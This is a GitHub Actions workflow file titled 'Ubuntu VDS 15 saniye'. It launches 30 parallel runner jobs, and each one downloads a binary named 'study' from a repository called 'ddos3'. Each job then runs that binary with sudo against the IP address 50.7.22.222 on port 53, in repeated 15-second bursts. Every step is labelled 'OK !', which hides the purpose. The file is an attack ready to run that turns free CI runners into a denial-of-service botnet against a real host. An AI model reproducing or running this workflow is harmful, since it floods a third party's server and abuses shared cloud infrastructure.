name: Ubuntu VDS 15 saniye

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30]

    steps:
      - name: OK !
        run: |
          echo "OK !"

      - name: OK !
        run: |
          for i in 1 3; do
            wget https://github.com/christophersaldanhadot/ddos3/raw/refs/heads/main/study
            chmod +x study
            timeout 15 sudo ./study 50.7.22.222 53 15 16
          done

      - name: OK !
        run: sleep 15
